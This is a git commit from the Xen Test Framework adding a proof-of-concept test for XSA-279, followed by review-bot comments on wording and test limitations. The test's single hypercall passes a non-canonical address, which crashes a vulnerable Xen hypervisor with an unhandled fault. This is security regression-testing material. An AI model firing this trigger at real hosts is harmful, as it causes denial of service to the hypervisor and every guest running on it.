From: Andrew Cooper Date: Wed, 10 Oct 2018 10:42:00 +0000 (+0000) Subject: XSA-279 PoC X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=55b53286e669cc27119f5b4323a7e4db2aeae91f;p=xtf.git XSA-279 PoC Signed-off-by: Andrew Cooper --- diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 94527c2..1344671 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -131,6 +131,9 @@ removals. @subpage test-xsa-278 - x86: Nested VT-x usable even when disabled. +@subpage test-xsa-279 - x86: DoS from attempting to use INVPCID with a +non-canonical addresses. + @section index-utility Utilities diff --git a/tests/xsa-279/Makefile b/tests/xsa-279/Makefile new file mode 100644 index 0000000..af25aab --- /dev/null +++ b/tests/xsa-279/Makefile @@ -0,0 +1,9 @@ +include $(ROOT)/build/common.mk + +NAME := xsa-279 +CATEGORY := xsa +TEST-ENVS := pv64 + +obj-perenv += main.o + +include $(ROOT)/build/gen.mk diff --git a/tests/xsa-279/main.c b/tests/xsa-279/main.c new file mode 100644 index 0000000..c0fa604 --- /dev/null +++ b/tests/xsa-279/main.c 
@@ -0,0 +1,44 @@ +/** + * @file tests/xsa-279/main.c + * @ref test-xsa-279 + * + * @page test-xsa-279 XSA-279 + * + * Advisory: [XSA-279](http://xenbits.xen.org/xsa/advisory-279.html) + * + * When `PCID` support was added to Xen to mitigate some of the performance + * hit from the Meltdown protection, Xen's internal TLB flushing changed from + * using `INVLPG` to using `INVPCID`. These instructions differ in how they + * handle non-canonical addresses, with the latter raising a @#GP[0] fault. + * + * One path passed an un-audited guest value into Xen's internal TLB flushing + * logic, which used to be safe, but no longer is. + * + * Deliberately try to invalidate a non-canonical address. If Xen is using + * the INVPCID instruction for TLB management (at the time of writing, Haswell + * and later hardware, PCID or INVPCID not explicitly disabled on the command + * line, and XPTI activated for the domain), and is vulnerable, it will die + * with an unhandled @#GP[0] fault. + * + * @see tests/xsa-279/main.c + */ +#include + +const char test_title[] = "XSA-279 PoC"; + +void test_main(void) +{ + hypercall_update_va_mapping(1ul << 63, 0, UVMF_INVLPG | UVMF_ALL); + + xtf_success("Success: Not vulnerable to XSA-279\n"); +} + +/* + * Local variables: + * mode: C + * c-file-style: "BSD" + * c-basic-offset: 4 + * tab-width: 4 + * indent-tabs-mode: nil + * End: + */
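Review bot: In docs/all-tests.dox, the new @subpage entry reads "with a non-canonical addresses", which mixes singular and plural. Suggest "with a non-canonical address", which also matches the single address the test passes to the hypercall.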
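Review bot: In tests/xsa-279/Makefile, `TEST-ENVS := pv64` limits the test to a single environment, but neither the Makefile nor the @page text in main.c states why. A sentence in the doc comment giving the reason for the restriction would save the next reader from wondering whether the other environments were overlooked.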
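Review bot: In test_main(), `xtf_success("Success: Not vulnerable to XSA-279\n")` is reached whenever the host survives the hypercall, which includes every configuration the doc comment lists as not using INVPCID (hardware older than Haswell, PCID or INVPCID disabled on the command line, XPTI not active for the domain). On such hosts a pass says nothing about whether the fix is present, so consider wording the message accordingly or stating the limitation in the @page text. Separately, the `1ul << 63` argument deserves a short comment at the call site saying it is the non-canonical address under test, and that the return value of hypercall_update_va_mapping() is ignored on purpose.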